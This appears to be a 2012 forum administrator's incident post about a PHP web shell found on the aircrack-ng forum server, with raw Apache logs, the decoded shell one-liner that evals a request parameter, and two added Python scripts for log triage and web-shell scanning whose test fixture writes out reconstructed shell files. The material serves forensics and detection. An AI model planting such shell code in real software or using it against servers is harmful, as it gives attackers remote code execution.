Hi,
as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.
The virus is detected by Sophos as Mal/Iframe-W. It was uploaded into the forum's 'data' directory as a separate PHP file called rbvzv.php (1418 bytes) that contains a base64-encoded payload; at runtime the payload is decoded and passed to PHP's eval(), which executes it.
If any of you guys are interested in the piece of code, you can download it here (the password is rbvzv.php); please don't use it for malicious purposes. I'd love to know what it does, but unfortunately I don't have the knowledge yet to decode it. I can read JavaScript, but the problem is that it's not plain Base64.
I checked the whole server: the attacker got in through the web server, with no login, and Apache didn't have any privileges (a user without bash, etc.).
For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"
As you can see, the file was created by that first guy, 91.224.160.132, and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php
I have to thank @SwissHttp on Twitter for decoding it, and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));
Basically, it executes whatever PHP code is passed in the request parameter 'asc' (from the query string or the POST body, and from cookies too depending on PHP's request_order setting, since it reads $_REQUEST), after running stripslashes() on it. The parameter name is built as 'a'.'s'.'c', so a plain search for the string 'asc' in the file won't find it. You can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.
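The log lines above can be triaged mechanically. The script below is an added example, not part of the original post or of the aircrack-ng project: it parses Apache combined-log lines (a subset of the lines above, with the User-Agent strings shortened and labelled as such), keeps the requests that hit /data/rbvzv.php, converts the timestamps to UTC (which reproduces the "May 22, 23:12 UTC" of the summary), lists the source IPs, and for the last line URL-decodes the 'asc' parameter and decodes the base64 argument of base64_decode(). That log line is truncated, so only a prefix of the payload can be recovered; it decodes to error_reporting(-1);set_time_limit(1800);ignore_user_abort(1); followed by the start of a $paths assignment, which looks like the beginning of a longer PHP script rather than a single command. The Referer of the first request (the forum's own /phpmyadmin/index.php) is printed as well, because it is the one lead in these lines for how the file got there, though nothing here proves that. The function and variable names are mine.

```python
import base64
import re
from datetime import datetime, timezone
from urllib.parse import unquote

# Apache combined-log lines copied from the post (a subset; the User-Agent
# strings are shortened here). The last request line is cut off in the
# original log, so its base64 blob is only a prefix.
LOG_LINES = [
    '91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"',
    '190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"',
    '200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"',
    '210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US)"',
]

SHELL_PATH = "/data/rbvzv.php"

# Apache "combined" format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# the base64 argument of base64_decode('...'), after URL-decoding
B64_ARG_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)")


def decode_b64_prefix(blob: str) -> str:
    """Decode a base64 string that may have been truncated (log lines get cut
    off): drop a dangling single char, re-pad, decode as latin-1 so it never
    raises on binary data."""
    blob = blob.rstrip("=")
    if len(blob) % 4 == 1:            # one leftover char carries no whole byte
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("latin-1")


def parse_ts(ts: str) -> datetime:
    """'23/May/2012:01:12:04 +0200' -> aware datetime converted to UTC."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)


def triage(lines, shell_path=SHELL_PATH):
    """One record per request that hit the web shell, with the 'asc' payload
    decoded when it is visible in the query string."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # not a combined-log line
        path, _, query = m["target"].partition("?")
        if path != shell_path:
            continue
        payload = decoded = None
        qm = re.search(r"asc=(.*)", query)            # tolerates the doubled '??'
        if qm:
            payload = unquote(qm.group(1))            # %27 -> '
            bm = B64_ARG_RE.search(payload)
            if bm:
                decoded = decode_b64_prefix(bm.group(1))
        hits.append({
            "ip": m["ip"],
            "when_utc": parse_ts(m["ts"]),
            "status": int(m["status"]),
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            "referer": m["referer"],
            "payload": payload,
            "decoded": decoded,
        })
    return hits


def first_seen(hits):
    return min(h["when_utc"] for h in hits)


def source_ips(hits):
    return sorted({h["ip"] for h in hits})


if __name__ == "__main__":
    hits = triage(LOG_LINES)
    print("first hit (UTC):", first_seen(hits).isoformat())
    print("source IPs:", ", ".join(source_ips(hits)))
    for h in hits:
        print(f'{h["when_utc"]:%Y-%m-%d %H:%M:%S} {h["ip"]:16} {h["bytes"]:5} bytes  referer={h["referer"]}')
        if h["decoded"]:
            print("  decoded asc payload prefix:", repr(h["decoded"]))
```

Response sizes are worth reading alongside the IPs: the 15- and 19-byte responses look like the shell answering with little or nothing, while the 727-, 1212- and 1270-byte ones returned real output, so those requests are the ones whose POST bodies one would most want to recover from a fuller capture. Pointing triage() at the full access log (and at the phpMyAdmin log, given that first Referer) is the natural next step.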
Unfortunately, I don't think I can do anything against those guys (besides talking about it); a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): the IP is in the Netherlands, but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information, which I just provided. We'll see how it goes.
As far as I know, it is limited to the forum and nothing else. The attacker didn't get onto the server or install any backdoor.
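Checking a web root for other copies of a shell like this one is a separate job from reading the logs. The scanner below is an added example, mine rather than the author's procedure: it walks a directory tree, and for every PHP file looks for an execution sink (eval, system, passthru, shell_exec, ...) fed from a request superglobal ($_REQUEST, $_GET, $_POST, $_COOKIE), both in the file itself and inside any base64 blob it contains that decodes to text, so that the eval(base64_decode('...')) wrapper cannot hide the real code. Because it matches $_REQUEST itself rather than the parameter name, the 'a'.'s'.'c' concatenation trick does not help the shell. It reports the modification time of each hit so it can be lined up with the access log the way the author did above. The fixture is constructed: its data/rbvzv.php is a reconstruction (the decoded one-liner from the post wrapped in eval(base64_decode())), not the real 1418-byte file, which was further obfuscated; the other file names and all function names are mine.

```python
import base64
import os
import re
import tempfile
import time
from pathlib import Path

# Request superglobals a web shell reads from, and functions that run whatever
# they are handed. preg_replace is left out: only its /e modifier executes
# code, and that needs a different check.
INPUT_SOURCES = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
EXEC_SINKS = re.compile(
    r"\b(?:eval|assert|system|exec|passthru|shell_exec|popen|proc_open)\s*\(", re.I
)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # runs long enough to hide code


def layers(text, depth=0, max_depth=3):
    """Yield (depth, text) for the source itself and, recursively, for every
    base64 blob inside it that decodes to text."""
    yield depth, text
    if depth >= max_depth:
        return
    for blob in B64_BLOB.findall(text):
        try:
            inner = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                     # binary data (an embedded image, etc.)
        yield from layers(inner, depth + 1, max_depth)


def reasons_for(source):
    """List why a PHP source looks like a web shell; empty means nothing found."""
    found = []
    for depth, layer in layers(source):
        sink = EXEC_SINKS.search(layer)
        src = INPUT_SOURCES.search(layer)
        if sink and src:
            name = sink.group(0)[:-1].strip()
            found.append(f"layer {depth}: {name}() fed from {src.group(0)}")
        elif depth > 0 and sink:
            found.append(f"layer {depth}: exec sink hidden under base64")
    if re.search(r"eval\s*\(\s*base64_decode\s*\(", source):
        found.append("layer 0: eval(base64_decode(...)) wrapper")
    return found


def scan(root, suffixes=(".php", ".phtml", ".php5")):
    """Walk root; return {relative path: {"mtime": ..., "reasons": [...]}} for
    every PHP file that triggers at least one reason."""
    root = Path(root)
    flagged = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            source = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        why = reasons_for(source)
        if why:
            flagged[path.relative_to(root).as_posix()] = {
                "mtime": path.stat().st_mtime, "reasons": why}
    return flagged


# Constructed fixture (hypothetical forum tree). data/rbvzv.php is a
# reconstruction: the decoded one-liner from the post, wrapped the way the
# post describes; the real file was 1418 bytes and more obfuscated.
SHELL_INNER = "if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));"


def build_fixture(root):
    root = Path(root)
    (root / "data").mkdir(parents=True, exist_ok=True)
    png_b64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\xff" * 60).decode()
    shell_b64 = base64.b64encode(SHELL_INNER.encode()).decode()
    files = {
        "index.php": "<?php require 'config.php'; echo 'forum'; ?>",
        "config.php": f"<?php $db = 'forum'; $logo = base64_decode('{png_b64}'); ?>",  # legit base64
        "data/rbvzv.php": f"<?php eval(base64_decode('{shell_b64}')); ?>",
        "data/c.php": "<?php system($_GET['cmd']); ?>",                               # unobfuscated shell
    }
    for rel, body in files.items():
        (root / rel).write_text(body, encoding="utf-8")
    old = time.time() - 90 * 86400           # legitimate files look long-installed
    for rel in ("index.php", "config.php"):
        os.utime(root / rel, (old, old))
    return root


def demo():
    """Build the fixture in a temporary directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan(build_fixture(tmp))


if __name__ == "__main__":
    for rel, info in demo().items():
        print(time.strftime("%Y-%m-%d %H:%M", time.localtime(info["mtime"])), rel)
        for reason in info["reasons"]:
            print("    ", reason)
```

Run scan("/path/to/webroot") on the real tree; the mtimes of anything it flags are what to compare with the first POST in the access log, as was done with the 01:12 timestamp above. A file that only matches the base64 wrapper without any input source is still worth opening by hand, since the payload may be built in a way this decoder does not follow.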
So here is what I'm going to do next: I'll check the forum database to see if they tried anything else against the forum (and check the Apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly, and when.
The forum is probably going to stay down for another week: I want to migrate it to another server, and I need to make sure everything works properly and that the new DNS records have propagated.
So, to summarize: it happened a day before I got the email letting me know there was a virus. It happened May 22 at 23h12 (11:12pm) GMT/UTC, and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.
Tuesday, May 29, 2012